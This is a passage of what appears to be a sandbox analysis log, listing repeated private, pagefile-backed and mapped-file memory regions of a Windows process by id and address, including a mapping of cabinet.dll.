private name = "private_0x0000000002f30000" filename = "" Region: id = 2270 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2271 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2272 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2273 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2274 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2275 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2276 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 2277 start_va = 0x3b80000 end_va = 0x3c80fff entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 2278 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2279 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2280 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2281 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2282 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2283 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 2284 start_va = 0x3b80000 end_va = 0x3c80fff entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 2285 start_va = 0x73d40000 end_va = 0x73d61fff entry_point = 0x73d40000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\SysWOW64\\cabinet.dll" (normalized: "c:\\windows\\syswow64\\cabinet.dll") Region: id = 2286 start_va = 0x36e0000 end_va = 0x36fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 2287 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2288 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2289 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2290 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2291 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2292 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 2293 start_va = 0x3b80000 end_va = 0x3c80fff entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 2294 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2295 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2296 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2297 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2298 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2299 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 2300 start_va = 0x3b80000 end_va = 0x3c80fff entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 2301 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2302 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2303 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2304 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2305 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2306 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 2307 start_va = 0x3b80000 end_va = 0x3c80fff entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 2308 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2309 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2310 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2311 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2312 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2313 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2314 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2315 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2316 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2317 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2318 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2319 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2320 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2321 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2322 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2323 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2324 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2325 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2326 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2327 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2328 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2329 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 2330 start_va = 0x3b80000 end_va = 0x3c80fff entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 2331 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2332 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2333 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2334 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2335 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2336 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2337 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2338 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2339 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2340 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2341 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2342 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2343 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2344 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2345 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2346 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2347 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2348 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2349 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2350 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 2351 start_va = 0x3b80000 end_va = 0x3c80fff entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 2352 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2353 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2354 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2355 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2356 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2357 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 2358 start_va = 0x3b80000 end_va = 0x3c80fff entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 2359 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2360 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2361 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2362 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2363 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2364 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 2365 start_va = 0x3b80000 end_va = 0x3c80fff entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 2366 start_va = 0x3250000 end_va = 0x3270fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003250000" filename = "" Region: id = 2367 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2368 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2369 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2370 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2371 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2372 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 2373 start_va = 0x3b80000 end_va = 0x3c80fff entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 2374 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2375 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2376 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2377 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2378 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2379 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 2380 start_va = 0x3b80000 end_va = 0x3c80fff entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 2381 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2382 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2383 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2384 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2385 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2386 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 2387 start_va = 0x3b80000 end_va = 0x3c80fff entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 2388 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2389 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2390 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2391 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2392 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2393 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 2394 start_va = 0x3b80000 end_va = 0x3c80fff entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 2395 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2396 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2397 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2398 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2399 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2400 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2401 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2402 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2403 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2404 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2405 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2406 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2407 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2408 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2409 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2410 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2411 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2412 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 2413 start_va = 0x3b80000 end_va = 0x3c80fff entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 2414 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2415 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2416 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2417 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2418 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2419 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 2420 start_va = 0x3b80000 end_va = 0x3c80fff entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 2421 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2422 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2423 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2424 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2425 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2426 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 2427 start_va = 0x3b80000 end_va = 0x3c80fff entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 2428 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2429 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2430 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2431 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2432 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2433 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 2434 start_va = 0x3b80000 end_va = 0x3c80fff entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 2435 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2436 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2437 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2438 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2439 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2440 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 2441 start_va = 0x3b80000 end_va = 0x3c80fff entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 2442 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2443 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2444 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2445 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2446 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2447 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2448 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2449 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2450 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2451 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2452 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2453 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2454 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2455 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2456 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2457 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2458 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2459 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2460 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2461 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2462 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2463 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2464 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2465 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 2466 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2467 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 2468 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2469 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 2470 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2471 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 2472 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 2473 start_va = 0x3000000 end_va = 0x3000fff entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 2474 start_va = 0x3000000 end_va = 0x3000fff entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 2475 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 2476 start_va = 0x3b80000 end_va = 0x3c80fff entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 2477 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2478 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 2479 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2480 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 2481 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2482 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 2483 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2484 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2485 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2486 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 2487 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2488 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2489 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2490 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 2491 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2492 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 2493 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2494 start_va = 0x2f50000 end_va = 